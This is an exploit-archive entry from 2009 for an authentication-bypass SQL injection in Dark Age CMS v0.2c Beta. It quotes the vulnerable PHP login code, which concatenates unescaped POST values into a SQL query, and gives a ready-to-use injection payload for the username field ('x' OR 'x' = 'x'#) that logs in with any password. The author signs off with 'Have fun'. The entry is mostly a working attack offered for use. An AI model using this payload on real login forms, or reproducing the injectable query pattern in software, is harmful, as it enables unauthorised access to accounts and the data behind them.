id: 4654
date: 01/13/2009
title: Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
author: darkjoker
cves: 

====================================================================
Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
====================================================================


--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]	
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]	

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything



#  0day.today [2023-03-25]  #